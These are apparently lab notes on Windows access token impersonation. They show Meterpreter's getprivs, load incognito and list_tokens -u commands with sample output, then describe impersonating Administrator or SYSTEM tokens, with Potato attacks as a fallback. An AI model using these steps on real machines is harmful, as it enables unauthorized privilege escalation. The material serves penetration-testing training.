Access Token
Get a meterpreter session on the target and follow the below techinique:-
getprivs
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeSystemtimePrivilege
SeTimeZonePrivilege
NOTE:- You need ImpersonatePrivilege to carry out this technique
#Access Token Impersonation
load incognito
# if the session dies, run the exploit againlist_tokens -u
Delegation Tokens Available # Interactive Logon
========================================
ATTACKDEFENSE\Administrator
NT AUTHORITY\LOCAL SERVICE
Impersonation Tokens Available # Non-Interactive Logon
========================================
No tokens available
ATTACKDEFENSE\Administratoraccount access token would provide elevated privileges

Listing tokens with this account, there can be additional available tokens
NT AUTHORITY\SYSTEMcan be impersonated, getting the privileges associated with its access token
In the case of no Delegation or Impersonation tokens found, the
Potato Attackcan be used to get or generate aNT AUTHORITY/SYSTEMaccess token, impersonating it and obtain privileges associated to it.
Last updated